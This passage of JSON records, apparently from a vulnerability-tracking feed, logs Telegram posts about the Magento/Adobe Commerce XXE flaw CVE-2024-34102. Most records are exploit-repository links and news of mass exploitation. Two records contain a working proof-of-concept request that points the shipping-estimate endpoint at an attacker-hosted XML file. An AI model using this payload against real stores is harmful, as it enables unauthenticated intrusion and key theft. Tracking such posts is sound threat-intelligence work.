"Telegram/PCh_d9fmJFPBixH8QOoJWnUBM5gc7tSxPSOlgO0A7_vni8v1", "content": "", "creation_timestamp": "2025-01-07T04:56:06.000000Z"}, {"uuid": "fb7ede20-9c20-45fc-944d-67adccd6381d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/AnonymousEgypt/22563", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-03T20:09:25.000000Z"}, {"uuid": "f669cb99-1900-4f92-adb8-060724a30922", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/267", "content": "CVE-2024-34102  POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}\n\n#CyberDilara #bugbountytips #bugbounty", "creation_timestamp": "2024-06-27T02:36:14.000000Z"}, {"uuid": "00aa3234-a8b6-4ff1-99ac-129a9cc23461", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/CyberDilara/266", "content": "Top 5 Trending CVEs:\n\n    1 - CVE-2024-5806\n    2 - CVE-2024-34102\n    3 - CVE-2024-23958\n    4 - CVE-2024-37032\n    5 - CVE-2024-21338\n\n#cve #cvetrends #cveshield #cybersecurity", "creation_timestamp": "2024-06-27T02:35:30.000000Z"}, {"uuid": "583fe772-948b-4431-9f2e-6c720c6c9380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/257", "content": "CVE-2024-34102  POC \n\nPOST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2\n\n{\"address\":{\"totalsCollector\":{\"collectorList\":{\"totalCollector\":{\"sourceData\":{\"data\":\"http://attacker*com/xxe.xml\",\"dataIsURL\":true,\"options\":1337}}}}}}", "creation_timestamp": "2024-06-26T05:14:18.000000Z"}, {"uuid": "625fa085-25e4-467f-84fe-af0bd0f28a0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/42703", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-07-10T04:50:59.000000Z"}, {"uuid": "d60c166e-0a83-434f-8b30-6aa87a6f0240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/AnonymousEgypt/23220", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-04T15:59:39.000000Z"}, {"uuid": "87c52f69-55df-451a-8d60-951fbc734fa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/42088", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-07-08T12:32:38.000000Z"}, {"uuid": "3686045c-0dab-46da-926f-0c2f5b4097d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/lostsec/704", "content": "are u guys ready for mass hunting CVE-2024-34102 ?", "creation_timestamp": "2024-07-01T12:19:18.000000Z"}, {"uuid": "c1096cb9-e15d-47cf-aa81-ed0686f5bd2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/lostsec/701", "content": "POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce\n\n1)templateLink\n2)eXploitLink", "creation_timestamp": "2024-06-30T14:29:15.000000Z"}, {"uuid": "7363a7fd-7017-4155-8e94-1bb396838ff0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "Telegram/rnSeUs2qdya-yEinROFxA8N7F3mjvuSNXUGSd_-xczm3plg", "content": "", "creation_timestamp": "2025-01-31T14:10:05.000000Z"}, {"uuid": "4617676a-5ca2-491c-9a38-af2fb5be065f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/562", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:33:14.000000Z"}, {"uuid": "9b518269-7d94-49b9-88ad-773a985b39b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/308", "content": "POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.\n\nhttps://github.com/bigb0x/CVE-2024-34102\n\n#exploit #hacking #cyberdilara", "creation_timestamp": "2024-07-01T10:07:33.000000Z"}, {"uuid": "ffd103da-0696-453e-9d6f-e31004d6631d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/4809", "content": "The Hacker News\nAlert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit\n\nCybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting.\nTracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,", "creation_timestamp": "2024-10-02T17:43:02.000000Z"}, {"uuid": "260e4749-8b21-4430-8260-455e83502040", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/KomunitiSiber/2664", "content": "Alert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit\nhttps://thehackernews.com/2024/10/alert-adobe-commerce-and-magento-stores.html\n\nCybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting.\nTracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,", "creation_timestamp": "2024-10-02T18:45:31.000000Z"}, {"uuid": "66feef6f-872b-4981-b74f-b164fcc0d18f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8444", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:55:12.000000Z"}, {"uuid": "712b2c87-7ac4-441d-928c-74c1a157f69c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3365", "content": "POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.\n\nhttps://github.com/bigb0x/CVE-2024-34102\n\n#exploit #hacking #cyberdilara", "creation_timestamp": "2024-07-01T11:57:54.000000Z"}, {"uuid": "8a788dba-ce8c-4542-a580-ddbfdb5145ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3581", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:33:21.000000Z"}, {"uuid": "3f5348bc-64db-46f7-b81a-16665d46ab03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2164", "content": "CVE-2024-34102\n*\nAdobe Commerce\n\u0412\u0435\u0440\u0441\u0438\u0438: 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8\nXXE vuln \n*\nExploit", "creation_timestamp": "2024-07-13T23:33:45.000000Z"}, {"uuid": "0027a2da-8aa6-4758-b04a-76e5aa50aba3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7132", "content": "Tools - Hackers Factory \n\nHellPot is an endless honeypot based on Heffalump that sends unruly HTTP bots to hell.\n\nhttps://github.com/yunginnanet/HellPot\n\nWork-in-progress date-time SQLite extension that will support timezones.\n\nhttps://github.com/asg017/sqlite-jiff\n\nSubdominator is a powerful tool for passive subdomain enumeration during bug hunting and reconnaissance processes. It is designed to help researchers and cybersecurity professionals discover potential security vulnerabilities by efficiently enumerating subdomains some various free passive resources.\n\nhttps://github.com/RevoltSecurities/Subdominator\n\nCVE-2024-4879 Exploit & PoC - Nuclei Template\n\nhttps://github.com/Brut-Security/CVE-2024-4879\n\nCVE-2024-34102: Unauthenticated Magento XXE.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-34102 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-34102\n\nCVE-2024-5009 : WhatsUp Gold SetAdminPassword Privilege Escalation.\n\nCVEHunter tool for vulnerability detection and exploitation tool for CVE-2024-5009 with Asychronous Performance.\n\nhttps://github.com/th3gokul/CVE-2024-5009\n\nSubprober - An essential HTTP multi-purpose Probing Tool for Penetration Testers and Security Researchers with Asynchronous httpx client support.\n\nhttps://github.com/RevoltSecurities/SubProber\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-01T03:55:12.000000Z"}, {"uuid": "b6703462-9a81-4517-a472-fe47c786a22f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "https://t.me/GrayHatsHack/6811", "content": "Top 5 Trending CVEs:\n\n    1 - CVE-2024-5806\n    2 - CVE-2024-34102\n    3 - CVE-2024-23958\n    4 - CVE-2024-37032\n    5 - CVE-2024-21338\n\n#cve #cvetrends #cveshield #cybersecurity", "creation_timestamp": "2024-06-27T05:11:41.000000Z"}, {"uuid": "9325d883-c05f-4274-ae48-7c154778a01c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1186", "content": "CVE-2024-34102\n\n\u062a\u0648\u0636\u06cc\u062d\u0627\u062a:\n\u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc 2.4.7\u060c 2.4.6-p5\u060c 2.4.5-p7\u060c 2.4.4-p8 \u0648 \u0646\u0633\u062e\u0647\u200c\u0647\u0627\u06cc \u0642\u0628\u0644\u06cc Adobe Commerce \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u06cc\u06a9 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a \u0646\u0627\u062f\u0631\u0633\u062a \u0627\u0631\u062c\u0627\u0639 \u0628\u0647 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc XML (XXE) \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u0646\u062f \u06a9\u0647 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u062c\u0631\u0627\u06cc \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u0634\u0648\u062f. \u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u06cc\u06a9 \u0633\u0646\u062f XML \u0633\u0627\u062e\u062a\u0647 \u0634\u062f\u0647 \u06a9\u0647 \u0628\u0647 \u0646\u0647\u0627\u062f\u0647\u0627\u06cc \u062e\u0627\u0631\u062c\u06cc \u0627\u0631\u062c\u0627\u0639 \u0645\u06cc\u200c\u062f\u0647\u062f\u060c \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f. \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0645\u0634\u06a9\u0644 \u0646\u06cc\u0627\u0632\u06cc \u0628\u0647 \u062a\u0639\u0627\u0645\u0644 \u06a9\u0627\u0631\u0628\u0631 \u0646\u062f\u0627\u0631\u062f.\n\n\u0627\u062b\u0628\u0627\u062a: https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md\n\nCVE-2024-34102\n\nDescription:\nAdobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction. \n\nPoc: https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md", "creation_timestamp": "2024-06-26T07:31:23.000000Z"}, {"uuid": "cb749673-3bf4-4440-aee7-d0dad1529630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/true_secator/6273", "content": "Sansec \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043c\u0443\u0434\u0430\u043a\u043e\u0432, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0441\u0435\u043c\u044c \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0432\u0437\u043b\u043e\u043c\u0430\u043b\u0438 5% \u0432\u0441\u0435\u0445 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432 Magento \u0438 Adobe Commerce \u0437\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0442\u0440\u0438 \u043c\u0435\u0441\u044f\u0446\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CosmicSting.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430\u00a0\u043f\u043e\u0441\u0442\u043e\u044f\u043d\u043d\u044b\u0435 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f CVE-2024-34102, \u043f\u043e\u0447\u0442\u0438 4200 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Cisco, Ray Ban, National Geographic, Whirlpool \u0438 Segway, \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u0438\u0441\u044c \u0441 \u043f\u043b\u0430\u0442\u0435\u0436\u043d\u044b\u043c \u0441\u043a\u0438\u043c\u043c\u0435\u0440\u043e\u043c \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u0438\u044f \u0437\u0430\u043a\u0430\u0437\u0430.\n\n\u041e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043a\u043e\u0433\u0434\u0430 Adobe \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0440\u0435\u0439\u0442\u0438\u043d\u0433, \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0443\u0436\u0435 \u043d\u0430\u0447\u0430\u043b\u0438\u0441\u044c \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u043a\u043b\u044e\u0447\u0435\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f (\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0442\u043e\u043a\u0435\u043d\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 API) \u0443\u0436\u0435 \u0431\u044b\u043b\u0438 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u044b.\n\n\u041a\u043e\u0433\u0434\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u044b \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0438 \u043a \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044e \u0441\u0432\u043e\u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c, \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u0441\u0435\u043a\u0440\u0435\u0442\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0430\u043d\u043d\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u044b, \u0447\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b\u043e \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u043c\u0438 \u0434\u043b\u044f \u043d\u0435\u0441\u0430\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439.\n\nAdobe\u00a0\u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e, \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044f \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0443\u0447\u043d\u0443\u044e \u0443\u0434\u0430\u043b\u0438\u0442\u044c \u0441\u0442\u0430\u0440\u044b\u0435 \u043a\u043b\u044e\u0447\u0438, \u043d\u043e, \u043a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u0443\u0441\u043b\u044b\u0448\u0430\u043b\u0438 \u043d\u0435 \u0432\u0441\u0435.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 CosmicSting \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0438 \u043a\u0430\u0436\u0434\u043e\u043c\u0443 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c\u0443 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0430\u0439\u0442\u043e\u043c \u0443 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0433\u043e \u0430\u043a\u0442\u043e\u0440\u0430.\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u0434\u043e \u0442\u0440\u0435\u0445 \u0440\u0430\u0437\u043d\u044b\u0445 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u043e\u0432 \u043f\u043e\u0441\u0435\u0449\u0430\u043b\u043e \u043e\u0434\u0438\u043d \u0438 \u0442\u043e\u0442 \u0436\u0435 \u043c\u0430\u0433\u0430\u0437\u0438\u043d.\n\nSansec \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b \u0438 \u0441\u043e\u0431\u0440\u0430\u043b \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e CosmicSting, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u044b \u0441 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u043c\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u043c\u0438 \u0430\u0442\u0430\u043a \u0438 \u043c\u0435\u0442\u043e\u0434\u0430\u043c\u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438.\n\n\u0421\u0440\u0435\u0434\u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0445 Sansec \u0433\u0440\u0443\u043f\u043f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438\u0441\u044c: Bobry, Polyovki, Surki, Burunduki, Ondatry, Khomyaki, Belki.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Sansec \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u0443\u044e\u0442, \u0447\u0442\u043e \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u043c\u0435\u0441\u044f\u0446\u044b \u0431\u0443\u0434\u0435\u0442 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043e \u0435\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0435 \u043f\u043b\u043e\u0449\u0430\u0434\u043e\u043a (\u043c\u0443\u0434\u0430\u043a\u043e\u0432), \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 75% \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432 Adobe Commerce \u0438 Magento \u043d\u0435 \u0431\u044b\u043b\u0438 